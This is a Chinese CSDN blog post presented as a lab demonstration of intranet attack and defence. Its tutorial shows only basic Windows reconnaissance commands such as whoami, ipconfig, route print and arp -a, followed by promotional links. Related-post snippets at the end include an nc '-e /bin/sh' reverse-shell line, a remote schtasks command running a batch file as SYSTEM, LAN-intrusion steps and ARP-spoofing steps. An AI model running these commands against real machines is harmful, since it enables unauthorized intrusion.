网络安全工程师演示:黑客是如何进行内网计算机攻防的?

已于 2024-01-29 20:36:23 修改
阅读量307 收藏 1
点赞数
文章标签: web安全 网络 linux 网络安全 webpack
于 2023-06-06 11:53:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y525698136/article/details/131064836
版权

课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络攻防干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
局域网自然就是局部地区形成的一个区域网络,其特点就是分布地区范围有限,可大可小,大到一栋建筑楼 与相邻建筑之间的连接,小到可以是办公室之间的联系。局域网自身相对其他网络传输速度更快,性能更稳定,框架简易,并且是封闭性,这也是很多机构选择的原因所在。局域网自身的组成大体由计算机设备、网络连接设备、网络传输介质3大部分构成,其中,计算机设备又包括服务器与工作站,网络连接设备则包含了网卡、集线器、交换机,网络传输介质简单来说就是网线,由同轴电缆、双绞线及光缆3大原件构成。
二、资源装备
1.安装好 Win7的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 进入Windows的DOS界面,如下图所示。
步骤:Win+R/输入cmd
在这里插入图片描述

3.2 在进入的DOS界面查看用户,如下图所示。
命令:whoami
命令:whoami /all
在这里插入图片描述
在这里插入图片描述

3.3 在进入的界面查看计算机主机名,如下图所示。
命令:hostname
在这里插入图片描述

3.4 也可以利用图形化界面查看计算机的详细信息,如下图所示。
步骤:此电脑/系统属性/
在这里插入图片描述

系统属性中的计算机详细信息如下图所示。
在这里插入图片描述

3.5 查看计算机的网络信息,如下图所示。
命令:ipconfig
在这里插入图片描述

命令:ipconfig /all
在这里插入图片描述

3.6 查看电脑的路由信息,如下图所示。
命令:route print
在这里插入图片描述

3.7 查看内网中的计算机主机,如下图所示。
命令:arp -a
在这里插入图片描述
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?

​最后

为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~

😝有需要的小伙伴,可以点击下方链接免费领取或者V扫描下方二维码免费领取🆓

👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)👈

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

因篇幅有限,仅展示部分资料

2️⃣视频配套资料&国内外网安书籍、文档

① 文档和书籍资料

② 黑客技术

因篇幅有限,仅展示部分资料

👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)👈

3️⃣网络安全源码合集+工具包

4️⃣网络安全面试题

5️⃣汇总

所有资料 ⚡️ ,朋友们如果有需要全套 《网络安全入门+进阶学习资源包》,扫码获取~

👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)👈

程序学到昏
关注
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
热门推荐
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
如何入侵局域网电脑
weixin_34242331的博客
01-07 4963
如何入侵局域网电脑 方法一:  1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。  2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。  3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明  4....
入侵局域网电脑
擅长写bug,摆烂,白日梦。
12-19 8466
方法一: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: X
局域网进行ARP欺骗攻击(Kali)_kali局域网攻击网络安全知识体系大纲
2401_84447417的博客
04-18 1015
开启IP转发功能,linux因为系统安全考虑,是不支持IP转发的,其配置文件写在/proc/sys/net/ipv4的ip_forward中。再次在win10中查看MAC地址,发现网关的MAC已经变回来了,因为ARP欺骗停止了,也证明了我们刚才的ARP欺骗成功了!然后输入命令查看:cat /proc/sys/net/ipv4/ip_forward 看看有没有改。用arpspoof工具,查看同网段下的所有活动IP,确认被攻击的IP地址。在windows10虚拟机(靶机)中查看局域网中的IP-MAC对照表。
网络攻防内网安全横向渗透权限提升
weixin_46626737的博客
06-30 778
schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外网机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)
一些近来对内网攻防的思考
huohaowen的博客
05-14 663
我知道我最近托更托了很久了,其实也不是小编懒啊这小编也是一直在写,但是遇到的问题比较多(我太菜了),所以一直拖着。但是总不能不更吧那就讲一下进来的一些内网攻防的思考吧。
内网安全:隧道技术详解
zz12345600354的博客
04-29 1101
Block)协议是一种在计算机网络中共享文件、打印机和其他资源的通信协议。它最初由微软开发,用于在局域网中的计算机之间共享文件和资源,445端口运行打印机共享:SMB协议支持打印机的共享,允许用户在网络中使用共享打印机进行打印操作。通过SMB协议,用户可以连接到其他计算机上的共享打印机,并发送打印任务进行打印。文件共享:SMB协议允许计算机之间共享文件和目录。通过SMB协议,用户可以在网络中访问其他计算机上的共享文件夹,并进行文件的读取、写入和管理操作。
python安全工程师倾囊传授30多种黑客攻防实战技术|云|盘
leo_py的博客
09-21 677
黑客技术你也可以学会 黑客,在大多数普通网民的印象中都是非常神秘的网络终结者形象。 他们在网络中攻无不克、战无不胜,似乎无所不能,电影里塑造形象的黑客形象通常是,黑客手拿掌上pad,双手飞速敲出几行复杂的代码,然后突然打开了一个安保级别非常高的系统,那么黑客是真的防不胜防,“码力无边”吗? 实际上,黑客的技术并没有多么复杂,一个没有什么编程基础的网络小白,在科学的方法指导下也可以很快地成为一名合格的黑客。 Python安全专家11招黑客攻击秘籍网|盘下载点此 网络攻击的30种常见方..
【愚公系列】2023年05月 网络安全高级班 037.WEB渗透与安全攻防实验室与靶机说明)
时光隧道
05-14 8168
Web安全是指通过采取措施,保护Web应用程序和Web服务器免受未经授权的访问、不当配置和错误的安全策略、恶意软件和攻击的影响的过程。这包括保护数据、保护用户隐私、防止网络攻击、确保安全的身份验证和访问控制等方面。实施Web安全措施可以减少系统漏洞的出现,提高系统的安全性,保护用户的个人信息和安全。漏洞扫描和漏洞利用SQL注入攻击和防御XSS(跨站点脚本)攻击和防御CSRF(跨站点请求伪造)攻击和防御文件包含漏洞攻击和防御DDOS(分布式拒绝服务)攻击和防御网络拓扑和渗透测试方法。
内网渗透讲义
03-22
内网渗透讲义
87张高清匿名者黑客电脑桌面壁纸
07-03
87张高清匿名者黑客电脑桌面壁纸 87张高清匿名者黑客电脑桌面壁纸
内网攻防学习Day1——常见的内网结构
dzqxwzoe的博客
08-19 238
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。而实际上,因为域中的计算机是使用DNS来定位域控制器、服务器及其他计算机网络服务的,所以域的名字就是DNS域的名字。每个域中都有独立的安全策略。首先要理解一下组的概念,在组里包含了很多用户,当管理员想要给某个用户分配权限时,只需要将用户加入到对应权限的组里就行,从而提高了管理效率,常见的组有:域本地组、全局组、通用组。
内网安全攻防(一)
YUKIDDDD的博客
08-01 1087
第1章 内网基础知识1.1 内网基础知识 1.1 内网基础知识 内网也指局域网,是指在某一区域内由多台计算机互连而成的计算机组 工作组 将不同的计算机按功能进行分组就产生了工作组的概念。 计算机可以随意加入或退出工作组 工作组里所有计算机都是对等的 工作组中的计算机可以互相共享资源 域(Domain) 域是一个有安全边界的计算机集合 域的安全管理机制更加严格,用户要访问域内的资源,必须以合法的身份登录域 用户对域内的资源权限取决于用户身份 单域 在一个域内,一般要有至少两台域服务器,一台作为
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
04-14 4778
内网渗透-实战|手把手教你如何进行内网渗透
内网渗透学习
diqi0762的博客
03-25 1686
Table of Contents 信息搜集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取 进入内网 基于企业...
红队内网攻防渗透:内网渗透之内网对抗:隧道技术篇&防火墙组策略&FRP&NPS&Chisel&Socks代理&端口映射&C2上线
最新发布
HACKONE的博客
06-21 742
目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,DNS解析等),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。Frp是专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)建立客户端连接服务端后将141上5555给到服务端6666上。服务端启动:frps -c frps.ini。
网络安全黑客内网渗透基础知识_超详细
wly55690的博客
05-14 1189
内网也指局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的历程安排、电子邮件和传真通信服务等功能。内网是封闭型的,它可以由办公室内的两台计算机组成,也可以由一个公司内的上千台计算机组成。列如银行、学校、企业工厂、政府机关、网吧、单位办公网等都属于此类。
网络攻防黑客在同一个网络局域网内如何控制目标Windows系统主机并登陆系统或监听用户操作?Windows 渗透测试包含:windows2018、windows2008、windows xp等等
代码讲故事
04-16 239
网络攻防黑客在同一个网络局域网内如何控制目标Windows系统主机并登陆系统或监听用户操作?Windows 渗透测试包含:windows2012、windows2008、windows xp等等。
计算机网络安全实验指导:命令使用与网络攻防
"该资源是一份关于计算机网络安全的实验报告,涵盖了多个实验主题,包括基本网络测试命令的使用、主机渗透、网络分析、中间人攻击、木马与后门以及服务器安全设置等内容。实验旨在让学生通过实践操作了解并掌握网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值